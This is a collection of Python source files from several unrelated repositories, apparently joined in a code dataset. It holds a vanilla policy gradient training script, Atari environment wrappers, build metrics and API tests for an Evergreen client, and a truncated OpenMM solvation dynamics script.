print('loss: {}, accuracy: {}%'.format(round(loss, 10), round(accuracy, 1)))
else:
visualize_training(args)
``` |
{
"source": "JimOhman/policy-gradient-algorithms",
"score": 2
} |
#### File: policy-gradient-algorithms/VPG/main.py
```python
from agent import VPGAgent
import numpy as np
import gym
from args import parse_args
from logger import Logger
from networks import SimpleNet
from torch.optim import RMSprop, Adam
import datetime
import pytz
import time
def get_env(args):
env = gym.make(args['environment'])
return env
def get_net(env, args):
state_space = env.observation_space.shape[0]
action_space = env.action_space.n
if args['architecture'] == 'SimpleNet':
net = SimpleNet(action_space=action_space, state_space=state_space)
else:
raise NotImplementedError
return net
def get_opt(net, args):
if args['optimizer'] == 'Adam':
optimizer = Adam(net.parameters(), lr=args['learning_rate'], eps=0.00015)
elif args['optimizer'] == 'RMSprop':
optimizer = RMSprop(net.parameters(), lr=args['learning_rate'], momentum=0.95, eps=0.01)
else:
raise NotImplementedError
return optimizer
def get_agent(net, optimizer, env, args):
agent = VPGAgent(net=net, optimizer=optimizer, env=env, args=args)
return agent
def train(agent, args, logr=None):
verbose = args['verbose']
total_batches = args['total_batches']
render = args['render_env']
print("\nStarting training towards {} batch updates. \n".format(total_batches))
for batch_num in range(total_batches):
batch_loss, batch_rets, batch_lens = agent.train_one_batch(render=render)
if verbose:
date_now = datetime.datetime.now(tz=pytz.timezone('Europe/Stockholm')).strftime("%d-%b-%Y_%H:%M:%S")
batch_stats = (round(np.mean(batch_lens)), round(np.std(batch_lens)),
round(np.mean(batch_rets)), round(np.std(batch_rets)))
print("[{}] ({}/{}) --> length: {} ({}), return: {} ({})".format(date_now,
batch_num,
total_batches,
*batch_stats))
if logr is not None:
logr.add_value(tag='loss', value=batch_loss.detach(), it=batch_num)
logr.add_value(tag='return', value=np.mean(batch_rets), it=batch_num)
logr.add_value(tag='length', value=np.mean(batch_lens), it=batch_num)
batch_num += 1
print("\nFinished training.")
def init(args):
print()
env = get_env(args=args)
print("Using environment: {}".format(args['environment']))
net = get_net(env=env, args=args)
print("1. Created net: {}".format(args['architecture']))
optimizer = get_opt(net=net, args=args)
print("2. Created optimizer: {} with lr = {}".format(args['optimizer'], args['learning_rate']))
agent = get_agent(net=net, optimizer=optimizer, env=env, args=args)
print("3. Assembled agentrithm: {}".format(args['agentrithm']))
time.sleep(1.)
return env, net, optimizer, agent
def evaluate(agent, args):
render = args['render_env']
eps_rews = [], eps_obs = []
for episode_num in range(args['eval_episodes']):
ep_rews, ep_obs, _ = agent.run_one_episode(render=render)
print("Batch {} ==> return: {}, length = {}".format(sum(ep_rews), len(ep_rews)))
eps_rews.append(ep_rews)
eps_obs.append(ep_obs)
if __name__ == '__main__':
args = parse_args()
run_tag = '|' + 'opt-' + args['optimizer'] + '|' + 'lr-' + str(args['learning_rate'])
logr = Logger(args=args, run_tag=run_tag)
env, net, optimizer, agent = init(args)
if args['mode'] == 'train':
train(agent=agent, args=args, logr=logr)
elif args['mode'] == 'evaluate':
        evaluate(agent=agent, args=args)
else:
raise NotImplementedError
```
#### File: policy-gradient-algorithms/VPG/utils.py
```python
import numpy as np
import os
os.environ.setdefault('PATH', '')
from collections import deque
import gym
from gym import spaces
import cv2
cv2.ocl.setUseOpenCL(False)
class StateMaker(object):
def __init__(self, frames):
self.frames = frames
def _concat(self):
self.out = np.concatenate(self.frames)[np.newaxis, ...]
return self.out
def __array__(self, dtype=None):
state = self._concat()
if dtype is not None:
state = state.astype(dtype)
return state
class NoopResetEnv(gym.Wrapper):
def __init__(self, env, noop_max=30):
"""Sample initial states by taking random number of no-ops on reset.
No-op is assumed to be action 0.
"""
gym.Wrapper.__init__(self, env)
self.noop_max = noop_max
self.override_num_noops = None
self.noop_action = 0
assert env.unwrapped.get_action_meanings()[0] == 'NOOP'
def reset(self, **kwargs):
""" Do no-op action for a number of steps in [1, noop_max]."""
self.env.reset(**kwargs)
if self.override_num_noops is not None:
noops = self.override_num_noops
else:
noops = self.unwrapped.np_random.randint(1, self.noop_max + 1)
assert noops > 0
obs = None
for _ in range(noops):
obs, _, done, _ = self.env.step(self.noop_action)
if done:
obs = self.env.reset(**kwargs)
return obs
def step(self, act):
return self.env.step(act)
class FireResetEnv(gym.Wrapper):
def __init__(self, env):
"""Take action on reset for environments that are fixed until firing."""
gym.Wrapper.__init__(self, env)
assert env.unwrapped.get_action_meanings()[1] == 'FIRE'
assert len(env.unwrapped.get_action_meanings()) >= 3
def reset(self, **kwargs):
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(1)
if done:
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(2)
if done:
self.env.reset(**kwargs)
return obs
def step(self, act):
return self.env.step(act)
class EpisodicLifeEnv(gym.Wrapper):
def __init__(self, env):
"""Make end-of-life == end-of-episode, but only reset on true game over.
Done by DeepMind for the DQN and co. since it helps value estimation.
"""
gym.Wrapper.__init__(self, env)
self.lives = 0
self.was_real_done = True
def step(self, action):
obs, reward, done, info = self.env.step(action)
self.was_real_done = done
# check current lives, make loss of life terminal,
# then update lives to handle bonus lives
lives = self.env.unwrapped.ale.lives()
if lives < self.lives and lives > 0:
# for Qbert sometimes we stay in lives == 0 condition for a few frames
# so it's important to keep lives > 0, so that we only reset once
# the environment advertises done.
done = True
self.lives = lives
return obs, reward, done, info
def reset(self, **kwargs):
"""Reset only when lives are exhausted.
This way all states are still reachable even though lives are episodic,
and the learner need not know about any of this behind-the-scenes.
"""
if self.was_real_done:
obs = self.env.reset(**kwargs)
else:
# no-op step to advance from terminal/lost life state
obs, _, _, _ = self.env.step(0)
self.lives = self.env.unwrapped.ale.lives()
return obs
class MaxAndSkipEnv(gym.Wrapper):
def __init__(self, env, skip=4):
"""Return only every `skip`-th frame"""
gym.Wrapper.__init__(self, env)
# most recent raw observations (for max pooling across time steps)
self._obs_buffer = np.zeros((2,)+env.observation_space.shape, dtype=np.uint8)
self._skip = skip
def step(self, action):
"""Repeat action, sum reward, and max over last observations."""
total_reward = 0.0
done = None
for i in range(self._skip):
obs, reward, done, info = self.env.step(action)
if i == self._skip - 2: self._obs_buffer[0] = obs
if i == self._skip - 1: self._obs_buffer[1] = obs
total_reward += reward
if done:
break
# Note that the observation on the done=True frame
# doesn't matter
max_frame = self._obs_buffer.max(axis=0)
return max_frame, total_reward, done, info
def reset(self, **kwargs):
return self.env.reset(**kwargs)
class ClipRewardEnv(gym.RewardWrapper):
def __init__(self, env):
gym.RewardWrapper.__init__(self, env)
def reward(self, reward):
return np.sign(reward)
class WarpFrame(gym.ObservationWrapper):
def __init__(self, env, width=84, height=84, grayscale=True):
super().__init__(env)
self._width = width
self._height = height
self._grayscale = grayscale
if self._grayscale:
num_colors = 1
else:
num_colors = 3
new_space = gym.spaces.Box(low=0,
high=255,
shape=(self._height, self._width, num_colors),
dtype=np.uint8)
original_space = self.observation_space
self.observation_space = new_space
assert original_space.dtype == np.uint8 and len(original_space.shape) == 3
def observation(self, obs):
if self._grayscale:
obs = cv2.cvtColor(obs, cv2.COLOR_RGB2GRAY)
obs = np.expand_dims(obs, -1)
obs = cv2.resize(obs, (self._width, self._height), interpolation=cv2.INTER_AREA)
return obs
class FrameStack(gym.Wrapper):
def __init__(self, env, k):
gym.Wrapper.__init__(self, env)
self.k = k
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
self.observation_space = spaces.Box(low=0, high=255, shape=(shp[:-1] + (shp[-1] * k,)), dtype=env.observation_space.dtype)
def reset(self):
obs = self.env.reset()
for _ in range(self.k):
self.frames.append(obs)
return self._get_ob()
def step(self, action):
obs, reward, done, info = self.env.step(action)
self.frames.append(obs)
return self._get_ob(), reward, done, info
def _get_ob(self):
assert len(self.frames) == self.k
return LazyFrames([list(self.frames)])
class ScaledFloatFrame(gym.ObservationWrapper):
def __init__(self, env):
gym.ObservationWrapper.__init__(self, env)
self.observation_space = gym.spaces.Box(low=0, high=1, shape=env.observation_space.shape, dtype=np.float32)
def observation(self, observation):
return np.array(observation).astype(np.float32) / 255.0
class LazyFrames(object):
def __init__(self, frames):
self._frames = frames
self._out = None
def _force(self):
if self._out is None:
self._out = np.concatenate(self._frames, axis=-1)[np.newaxis, ...]
self._frames = None
return self._out
def __array__(self, dtype=None):
out = self._force()
if dtype is not None:
out = out.astype(dtype)
return out
def __len__(self):
return len(self._force())
def __getitem__(self, i):
return self._force()[i]
def count(self):
frames = self._force()
return frames.shape[frames.ndim - 1]
def frame(self, i):
return self._force()[..., i]
def make_atari(env_id, max_episode_steps=None):
env = gym.make(env_id)
assert 'NoFrameskip' in env.spec.id
env = NoopResetEnv(env, noop_max=30)
env = MaxAndSkipEnv(env, skip=4)
return env
def wrap_deepmind(env, episode_life=True, clip_rewards=True, frame_stack=False, scale=False):
"""Configure environment for DeepMind-style Atari.
"""
if episode_life:
env = EpisodicLifeEnv(env)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
env = WarpFrame(env)
if scale:
env = ScaledFloatFrame(env)
if clip_rewards:
env = ClipRewardEnv(env)
if frame_stack:
env = FrameStack(env, 4)
return env
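# Example (a standard Gym Atari id, shown for illustration):
#   env = wrap_deepmind(make_atari('PongNoFrameskip-v4'), frame_stack=True, scale=True)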
``` |
{
"source": "jimoleary/evergreen.py",
"score": 2
} |
#### File: evergreen/metrics/buildmetrics.py
```python
from __future__ import absolute_import
from __future__ import division
from structlog import get_logger
from evergreen.errors.exceptions import ActiveTaskMetricsException
LOGGER = get_logger(__name__)
class BuildMetrics(object):
"""Metrics about an evergreen build."""
def __init__(self, build):
"""
Create an instance of build metrics.
:param build: Build to analyze.
"""
self.build = build
self.success_count = 0
self.failure_count = 0
self.undispatched_count = 0
self.timed_out_count = 0
self.system_failure_count = 0
self.estimated_build_costs = 0
self.total_processing_time = 0
self._create_times = []
self._start_times = []
self._finish_times = []
self.task_list = None
def calculate(self, task_filter_fn=None):
"""
Calculate metrics for the given build.
:param task_filter_fn: function to filter tasks included for metrics, should accept a task
argument.
:returns: self.
"""
all_tasks = self.build.get_tasks()
filtered_task_list = all_tasks
if task_filter_fn:
filtered_task_list = [task for task in filtered_task_list if task_filter_fn(task)]
self.task_list = filtered_task_list
        # We want to track display tasks, but not use them for metrics, since they are just
        # containers for other tasks.
filtered_task_list = [task for task in self.task_list if not task.display_only]
for task in filtered_task_list:
self._count_task(task)
return self
@property
def total_tasks(self):
"""
Get the total tasks in the build.
:return: total tasks.
"""
return self.success_count + self.failure_count + self.undispatched_count
@property
def pct_tasks_success(self):
"""
Get the percentage of successful tasks.
:return: Percentage of successful tasks.
"""
return self._percent_tasks(self.success_count)
@property
def pct_tasks_undispatched(self):
"""
Get the percentage of undispatched tasks.
:return: Percentage of undispatched tasks.
"""
return self._percent_tasks(self.undispatched_count)
@property
def pct_tasks_failed(self):
"""
Get the percentage of failed tasks.
:return: Percentage of failed tasks.
"""
return self._percent_tasks(self.failure_count)
@property
def pct_tasks_timed_out(self):
"""
Get the percentage of timeout tasks.
:return: Percentage of timeout tasks.
"""
return self._percent_tasks(self.timed_out_count)
@property
def pct_tasks_system_failure(self):
"""
Get the percentage of system failure tasks.
:return: Percentage of system failure tasks.
"""
return self._percent_tasks(self.system_failure_count)
@property
def create_time(self):
"""
Time the first task of the build was created.
:return: Time first task was created.
"""
if self._create_times:
return min(self._create_times)
return None
@property
def start_time(self):
"""
Time first task of build was started.
:return: Time first task was started.
"""
if self._start_times:
return min(self._start_times)
return None
@property
def end_time(self):
"""
Time last task of build was completed.
:return: Time last task was completed.
"""
if self._finish_times:
return max(self._finish_times)
return None
@property
def makespan(self):
"""
Wall clock duration of build.
:return: Timedelta duration of build.
"""
if self.start_time and self.end_time:
return self.end_time - self.start_time
return None
@property
def wait_time(self):
"""
Wall clock duration until build was started.
:return: Timedelta duration until build was started.
"""
if self.start_time and self.create_time:
return self.start_time - self.create_time
return None
def _percent_tasks(self, n_tasks):
"""
Calculate the percent of n_tasks out of total.
:param n_tasks: Number of tasks to calculate percent of.
:return: percentage n_tasks is out of total tasks.
"""
if self.total_tasks == 0:
return 0
return n_tasks / self.total_tasks
def _count_task(self, task):
"""
Add stats for the given task to the metrics.
:param task: Task to add.
"""
if task.is_undispatched():
self.undispatched_count += 1
return # An 'undispatched' task has no useful stats.
if task.is_active():
LOGGER.warning('Active task found during metrics collection', task_id=task.task_id)
raise ActiveTaskMetricsException(task, 'Task in progress during metrics collection')
if task.is_success():
self.success_count += 1
else:
self.failure_count += 1
if task.is_system_failure():
self.system_failure_count += 1
if task.is_timeout():
self.timed_out_count += 1
if task.ingest_time:
self._create_times.append(task.ingest_time)
else:
self._create_times.append(task.start_time)
        if task.finish_time:
            self._finish_times.append(task.finish_time)
if task.start_time:
self._start_times.append(task.start_time)
self.estimated_build_costs += task.estimated_cost
self.total_processing_time += task.time_taken_ms / 1000
def as_dict(self, include_children=False):
"""
Provide a dictionary representation.
:param include_children: Include child tasks in dictionary.
:return: Dictionary of metrics.
"""
metric = {
'build': self.build.id,
'total_processing_time': self.total_processing_time,
'makespan': self.makespan.total_seconds(),
'wait_time': self.wait_time.total_seconds(),
'total_tasks': self.total_tasks,
'success_count': self.success_count,
'pct_tasks_success': self.pct_tasks_success,
'undispatched_count': self.undispatched_count,
'pct_tasks_undispatched': self.pct_tasks_undispatched,
'failure_count': self.failure_count,
'pct_tasks_failed': self.pct_tasks_failed,
'timed_out_count': self.timed_out_count,
'system_failure_count': self.system_failure_count,
'estimated_build_costs': self.estimated_build_costs,
}
if include_children:
metric['tasks'] = [task.json for task in self.task_list]
return metric
def __str__(self):
"""
Create string version of metrics.
:return: String version of the metrics.
"""
return """Build Id: {build_id}
Total Processing Time: {total_processing_time:.2f}s ({total_processing_time_min:.2f}m)
Makespan: {makespan:.2f}s ({makespan_min:.2f}m)
Wait Time: {waittime:.2f}s ({waittime_min:.2f}m)
Total Tasks: {total_tasks}
Successful Tasks: {success_count} ({success_pct:.2%})
Undispatched Tasks: {undispatched_count} ({undispatched_pct:.2%})
Failed Tasks: {failed_count} ({failed_pct:.2%})
Timeout Tasks: {timeout_count} ({timeout_pct:.2%})
System Failure Tasks: {system_failure_count} ({system_failure_pct:.2%})
Estimated Build Costs: {est_build_costs:.3f}
""".format(
build_id=self.build.id,
total_processing_time=self.total_processing_time,
total_processing_time_min=(self.total_processing_time / 60),
makespan=(self.makespan.total_seconds()),
makespan_min=(self.makespan.total_seconds() / 60),
waittime=(self.wait_time.total_seconds()),
waittime_min=(self.wait_time.total_seconds() / 60),
total_tasks=self.total_tasks,
success_count=self.success_count,
success_pct=self.pct_tasks_success,
undispatched_count=self.undispatched_count,
undispatched_pct=self.pct_tasks_undispatched,
failed_count=self.failure_count,
failed_pct=self.pct_tasks_failed,
timeout_count=self.timed_out_count,
timeout_pct=self.pct_tasks_timed_out,
system_failure_count=self.system_failure_count,
system_failure_pct=self.pct_tasks_system_failure,
est_build_costs=self.estimated_build_costs
).rstrip()
```
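A short usage sketch (not from the repository) showing how `BuildMetrics` might be driven from the REST client exercised in the tests below. The helper name and the task filter are illustrative, and obtaining `api` is assumed to happen elsewhere.

```python
from evergreen.metrics.buildmetrics import BuildMetrics

def summarize_build(api, build_id):
    """Compute metrics for one build; display tasks are already excluded by calculate()."""
    build = api.build_by_id(build_id)  # Build object from the evergreen REST client
    metrics = BuildMetrics(build).calculate(
        task_filter_fn=lambda task: not task.is_undispatched()  # optional filter, shown for illustration
    )
    print(metrics)  # human-readable summary via __str__
    return metrics.as_dict(include_children=False)
```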
#### File: tests/evergreen/test_api.py
```python
import os
import sys
try:
from unittest.mock import MagicMock
except ImportError:
from mock import MagicMock
import pytest
from requests.exceptions import HTTPError
from tenacity import RetryError
import evergreen.api as under_test
try:
from json.decoder import JSONDecodeError
except ImportError: # This doesn't exist in python 2.
pass
class TestRaiseForStatus(object):
@pytest.mark.skipif(
sys.version_info.major == 2,
reason='JSONDecodeError is not used in python2'
)
def test_non_json_error(self, mocked_api):
mocked_response = MagicMock()
mocked_response.json.side_effect = JSONDecodeError('json error', '', 0)
mocked_response.status_code = 500
mocked_response.raise_for_status.side_effect = HTTPError()
mocked_api.session.get.return_value = mocked_response
with pytest.raises(HTTPError):
mocked_api.version_by_id('version_id')
mocked_response.raise_for_status.assert_called_once()
def test_json_errors_are_passed_through(self, mocked_api):
error_msg = 'the error'
mocked_response = MagicMock()
mocked_response.json.return_value = {'error': error_msg}
mocked_response.status_code = 500
mocked_response.raise_for_status.side_effect = HTTPError()
mocked_api.session.get.return_value = mocked_response
with pytest.raises(HTTPError) as excinfo:
mocked_api.version_by_id('version_id')
assert error_msg in str(excinfo.value)
mocked_response.raise_for_status.assert_not_called()
class TestDistrosApi(object):
def test_all_distros(self, mocked_api):
mocked_api.all_distros()
mocked_api.session.get.assert_called_with(url=mocked_api._create_url('/distros'),
params=None, timeout=None)
class TestHostApi(object):
def test_all_hosts(self, mocked_api):
mocked_api.all_hosts()
mocked_api.session.get.assert_called_with(url=mocked_api._create_url('/hosts'), params={},
timeout=None)
def test_all_hosts_with_status(self, mocked_api):
mocked_api.all_hosts(status='success')
mocked_api.session.get.assert_called_with(url=mocked_api._create_url('/hosts'),
params={'status': 'success'}, timeout=None)
class TestProjectApi(object):
def test_all_projects(self, mocked_api):
mocked_api.all_projects()
expected_url = mocked_api._create_url('/projects')
mocked_api.session.get.assert_called_with(url=expected_url, params=None, timeout=None)
def test_project_by_id(self, mocked_api):
mocked_api.project_by_id('project_id')
expected_url = mocked_api._create_url('/projects/project_id')
mocked_api.session.get.assert_called_with(url=expected_url, params=None, timeout=None)
def test_recent_version_by_project(self, mocked_api):
mocked_api.recent_version_by_project('project_id')
expected_url = mocked_api._create_url('/projects/project_id/recent_versions')
mocked_api.session.get.assert_called_with(url=expected_url, params=None, timeout=None)
def test_patches_by_project(self, mocked_api):
patches = mocked_api.patches_by_project('project_id')
next(patches)
expected_url = mocked_api._create_url('/projects/project_id/patches')
mocked_api.session.get.assert_called_with(url=expected_url, params={'limit': 100},
timeout=None)
def test_commit_queue_for_project(self, mocked_api):
mocked_api.commit_queue_for_project('project_id')
expected_url = mocked_api._create_url('/commit_queue/project_id')
mocked_api.session.get.assert_called_with(url=expected_url, params=None, timeout=None)
def test_test_stats_by_project(self, mocked_api):
after_date = '2019-01-01'
before_date = '2019-02-01'
mocked_api.test_stats_by_project('project_id', after_date, before_date)
expected_url = mocked_api._create_url('/projects/project_id/test_stats')
expected_params = {
'after_date': after_date,
'before_date': before_date,
}
mocked_api.session.get.assert_called_with(url=expected_url, params=expected_params,
timeout=None)
class TestBuildApi(object):
def test_build_by_id(self, mocked_api):
mocked_api.build_by_id('build_id')
expected_url = mocked_api._create_url('/builds/build_id')
mocked_api.session.get.assert_called_with(url=expected_url, params=None, timeout=None)
def test_tasks_by_build(self, mocked_api):
mocked_api.tasks_by_build('build_id')
expected_url = mocked_api._create_url('/builds/build_id/tasks')
mocked_api.session.get.assert_called_with(url=expected_url, params={}, timeout=None)
class TestVersionApi(object):
def test_version_by_id(self, mocked_api):
mocked_api.version_by_id('version_id')
expected_url = mocked_api._create_url('/versions/version_id')
mocked_api.session.get.assert_called_with(url=expected_url, params=None, timeout=None)
def test_builds_by_version(self, mocked_api):
mocked_api.builds_by_version('version_id')
expected_url = mocked_api._create_url('/versions/version_id/builds')
mocked_api.session.get.assert_called_with(url=expected_url, params=None, timeout=None)
class TestPatchApi(object):
def test_patch_by_id(self, mocked_api):
mocked_api.patch_by_id('patch_id')
expected_url = mocked_api._create_url('/patches/patch_id')
mocked_api.session.get.assert_called_with(url=expected_url, params=None, timeout=None)
class TestTaskApi(object):
def test_task_by_id(self, mocked_api):
mocked_api.task_by_id('task_id')
expected_url = mocked_api._create_url('/tasks/task_id')
mocked_api.session.get.assert_called_with(url=expected_url, params=None, timeout=None)
def test_task_by_id_with_fetch_executions(self, mocked_api):
mocked_api.task_by_id('task_id', fetch_all_executions=True)
expected_url = mocked_api._create_url('/tasks/task_id')
expected_params = {
'fetch_all_executions': True
}
mocked_api.session.get.assert_called_with(url=expected_url, params=expected_params,
timeout=None)
def test_tests_by_task(self, mocked_api):
mocked_api.tests_by_task('task_id')
expected_url = mocked_api._create_url('/tasks/task_id/tests')
expected_params = {}
mocked_api.session.get.assert_called_with(url=expected_url, params=expected_params,
timeout=None)
def test_tests_by_task_with_status(self, mocked_api):
mocked_api.tests_by_task('task_id', status='success')
expected_url = mocked_api._create_url('/tasks/task_id/tests')
expected_params = {
'status': 'success'
}
mocked_api.session.get.assert_called_with(url=expected_url, params=expected_params,
timeout=None)
def test_tests_by_task_with_execution(self, mocked_api):
mocked_api.tests_by_task('task_id', execution=5)
expected_url = mocked_api._create_url('/tasks/task_id/tests')
expected_params = {
'execution': 5
}
mocked_api.session.get.assert_called_with(url=expected_url, params=expected_params,
timeout=None)
def test_tests_by_task_with_status_and_execution(self, mocked_api):
mocked_api.tests_by_task('task_id', status='success', execution=5)
expected_url = mocked_api._create_url('/tasks/task_id/tests')
expected_params = {
'status': 'success',
'execution': 5
}
mocked_api.session.get.assert_called_with(url=expected_url, params=expected_params,
timeout=None)
class TestOldApi(object):
    def test_manifest(self, mocked_api):
mocked_api.manifest('project_id', 'revision')
expected_url = mocked_api._create_old_url('plugin/manifest/get/project_id/revision')
mocked_api.session.get.assert_called_with(url=expected_url, params=None, timeout=None)
class TestLogApi(object):
def test_retrieve_log(self, mocked_api):
mocked_api.retrieve_task_log('log_url')
mocked_api.session.get.assert_called_with(url='log_url', params={}, timeout=None)
def test_retrieve_log_with_raw(self, mocked_api):
mocked_api.retrieve_task_log('log_url', raw=True)
mocked_api.session.get.assert_called_with(url='log_url', params={'text': 'true'},
timeout=None)
class TestCachedEvergreenApi(object):
def test_build_by_id_is_cached(self, mocked_cached_api):
build_id = 'some build id'
another_build_id = 'some other build id'
mocked_cached_api.build_by_id(build_id)
mocked_cached_api.build_by_id(build_id)
mocked_cached_api.build_by_id(another_build_id)
assert mocked_cached_api.session.get.call_count == 2
def test_version_by_id_is_cached(self, mocked_cached_api):
version_id = 'some version id'
another_version_id = 'some other version id'
assert mocked_cached_api.version_by_id(version_id)
assert mocked_cached_api.version_by_id(version_id)
assert mocked_cached_api.version_by_id(another_version_id)
assert mocked_cached_api.session.get.call_count == 2
def test_clear_caches(self, mocked_cached_api):
build_id = 'some build id'
version_id = 'some version id'
assert mocked_cached_api.build_by_id(build_id)
assert mocked_cached_api.version_by_id(version_id)
mocked_cached_api.clear_caches()
assert mocked_cached_api.build_by_id(build_id)
assert mocked_cached_api.version_by_id(version_id)
assert mocked_cached_api.session.get.call_count == 4
class TestRetryingEvergreenApi(object):
def test_no_retries_on_success(self, mocked_retrying_api):
version_id = 'version id'
mocked_retrying_api.version_by_id(version_id)
assert mocked_retrying_api.session.get.call_count == 1
@pytest.mark.skipif(
not os.environ.get('RUN_SLOW_TESTS'),
reason='Slow running test due to retries'
)
def test_three_retries_on_failure(self, mocked_retrying_api):
version_id = 'version id'
mocked_retrying_api.session.get.side_effect = HTTPError()
with pytest.raises(RetryError):
mocked_retrying_api.version_by_id(version_id)
assert mocked_retrying_api.session.get.call_count == under_test.MAX_RETRIES
@pytest.mark.skipif(
not os.environ.get('RUN_SLOW_TESTS'),
reason='Slow running test due to retries'
)
def test_pass_on_retries_after_failure(self, mocked_retrying_api):
version_id = 'version id'
successful_response = mocked_retrying_api.session.get.return_value
mocked_retrying_api.session.get.side_effect = [HTTPError(), successful_response]
mocked_retrying_api.version_by_id(version_id)
assert mocked_retrying_api.session.get.call_count == 2
def test_no_retries_on_non_http_errors(self, mocked_retrying_api):
version_id = 'version id'
mocked_retrying_api.session.get.side_effect = ValueError('Unexpected Failure')
with pytest.raises(ValueError):
mocked_retrying_api.version_by_id(version_id)
assert mocked_retrying_api.session.get.call_count == 1
``` |
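The retry tests above are skipped unless `RUN_SLOW_TESTS` is set. A small sketch (the test path is illustrative) for opting in programmatically rather than via the shell:

```python
import os
import pytest

# Opt in to the slow retry tests, then run just this module quietly.
os.environ["RUN_SLOW_TESTS"] = "1"
pytest.main(["tests/evergreen/test_api.py", "-q"])
```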
{
"source": "JIMonroe/Surface_Affinities_Optimization",
"score": 2
} |
#### File: Surface_Affinities_Optimization/analysis_scripts/ba_get_dynamics_bulk.py
```python
from __future__ import division, print_function
import sys, os
import copy
import numpy as np
import simtk.openmm as mm
import simtk.openmm.app as app
import simtk.unit as u
import parmed as pmd
from parmed.openmm.reporters import NetCDFReporter
from pymbar import mbar
from openmm_surface_affinities_lib import *
import waterlib as wl
from scipy import optimize
#Given a topology and structure file, this script sets up a simulation of a solvated solute
#(this code is for just in bulk!) and periodically kicks off NVE simulations from the NPT
#configurations and temperatures. These NVE simulations are then used to assess dynamics, while
#the trajectory in the NPT can be used to evaluate solute properties in the fully coupled
#ensemble. The below script applies to bulk systems.
def normalExponential(t, A, Tau):
#A function to define a normal exponential for fitting decay of water residency in shells
return A*np.exp(-(t/Tau))
def stretchedExponential(t, A, Tau, B):
#A function to define a stretched exponential for fitting the dipole vector autocorrelation function
return A*np.exp(-(t/Tau)**B)
def doSimDynamics(top, systemRef, integratorRef, platform, prop, temperature, scalexy=False, inBulk=False, state=None, pos=None, vels=None, nSteps=10000000):
#Input a topology object, reference system, integrator, platform, platform properties,
#and optionally state file, positions, or velocities
#If state is specified including positions and velocities and pos and vels are not None, the
#positions and velocities from the provided state will be overwritten
#Does NPT, stopping periodically to run NVE to compute dynamics
#Only the NPT simulation will be saved, not the NVE
#Copy the reference system and integrator objects
system = copy.deepcopy(systemRef)
integrator = copy.deepcopy(integratorRef)
#For NPT, add the barostat as a force
#If not in bulk, use anisotropic barostat
if not inBulk:
system.addForce(mm.MonteCarloAnisotropicBarostat((1.0, 1.0, 1.0)*u.bar,
temperature, #Temperature should be SAME as for thermostat
scalexy, #Set with flag for flexibility
scalexy,
True, #Only scale in z-direction
250 #Time-steps between MC moves
)
)
#If in bulk, have to use isotropic barostat to avoid any weird effects with box changing dimensions
else:
system.addForce(mm.MonteCarloBarostat(1.0*u.bar,
temperature,
250
)
)
#Create new simulation object for NPT simulation
sim = app.Simulation(top.topology, system, integrator, platform, prop, state)
#Also create copies and simulation object for the NVE we will be running
systemNVE = copy.deepcopy(systemRef)
integratorNVE = mm.VerletIntegrator(2.0*u.femtoseconds)
integratorNVE.setConstraintTolerance(1.0E-08)
simNVE = app.Simulation(top.topology, systemNVE, integratorNVE, platform, prop)
#Set the particle positions in the NPT simulation
if pos is not None:
sim.context.setPositions(pos)
#Apply constraints before starting the simulation
sim.context.applyConstraints(1.0E-08)
#Check starting energy decomposition if want
#decompEnergy(sim.system, sim.context.getState(getPositions=True))
#Initialize velocities if not specified
if vels is not None:
sim.context.setVelocities(vels)
else:
try:
testvel = sim.context.getState(getVelocities=True).getVelocities()
print("Velocities included in state, starting with 1st particle: %s"%str(testvel[0]))
#If all the velocities are zero, then set them to the temperature
if not np.any(testvel.value_in_unit(u.nanometer/u.picosecond)):
print("Had velocities, but they were all zero, so setting based on temperature.")
sim.context.setVelocitiesToTemperature(temperature)
except:
print("Could not find velocities, setting with temperature")
sim.context.setVelocitiesToTemperature(temperature)
#Set up the reporter to output energies, volume, etc.
sim.reporters.append(app.StateDataReporter(
'prod_out.txt', #Where to write - can be stdout or file name (default .csv, I prefer .txt)
500, #Number of steps between writes
step=True, #Write step number
time=True, #Write simulation time
potentialEnergy=True, #Write potential energy
kineticEnergy=True, #Write kinetic energy
totalEnergy=True, #Write total energy
temperature=True, #Write temperature
volume=True, #Write volume
density=False, #Write density
speed=True, #Estimate of simulation speed
separator=' ' #Default is comma, but can change if want (I like spaces)
)
)
#Set up reporter for printing coordinates (trajectory)
sim.reporters.append(NetCDFReporter(
'prod.nc', #File name to write trajectory to
500, #Number of steps between writes
crds=True, #Write coordinates
vels=True, #Write velocities
frcs=False #Write forces
)
)
#Identify solute indices and water oxygen indices
soluteInds = []
owInds = []
hw1Inds = []
hw2Inds = []
for res in top.residues:
if res.name not in ['OTM', 'CTM', 'STM', 'NTM', 'SOL']:
for atom in res.atoms:
soluteInds.append(atom.idx)
elif res.name == 'SOL':
for atom in res.atoms:
if atom.name == 'OW':
owInds.append(atom.idx)
elif atom.name == 'HW1':
hw1Inds.append(atom.idx)
elif atom.name == 'HW2':
hw2Inds.append(atom.idx)
print("Solute indices:")
print(soluteInds)
#print("Water oxygen indices:")
#print(owInds)
#print("Water hydrogen (1st) indices:")
#print(hw1Inds)
#print("Water hydrogen (2nd) indices:")
#print(hw2Inds)
#Define cutoffs for solute solvation shells
solShell1Cut = 0.55 #nanometers from all solute atoms (including hydrogens)
solShell2Cut = 0.85
#Create array to store the dynamic information of interest every 0.2 ps (100 steps) for 50 ps
calcSteps = 100
calcTotSteps = 25000
numWats = np.zeros((int(calcTotSteps/calcSteps)+1, 2)) #Number waters that started in shell that are in shell at later time
dipCorrs = np.zeros((int(calcTotSteps/calcSteps)+1, 2)) #Dipole correlation in both solute shells
#Start running dynamics
print("\nRunning NPT simulation with interspersed NVE to find dynamics...")
sim.context.setTime(0.0)
stepChunk = 5000 #Run NVE for 50 ps to find dynamics every 10 ps
countSteps = 0
while countSteps < nSteps:
countSteps += stepChunk
sim.step(stepChunk)
#Record the simulation state so can kick off the NVE simulation
thisState = sim.context.getState(getPositions=True, getVelocities=True)
#Get solute and water oxygen coordinates after wrapping around the solute
coords = thisState.getPositions(asNumpy=True)
boxDims = np.diagonal(thisState.getPeriodicBoxVectors(asNumpy=True))
wrapCOM = np.average(coords[soluteInds], axis=0)
coords = wl.reimage(coords, wrapCOM, boxDims) - wrapCOM
solCoords = coords[soluteInds]
owCoords = coords[owInds]
hw1Coords = coords[hw1Inds]
hw2Coords = coords[hw2Inds]
#Figure out which waters are in the solute solvation shells
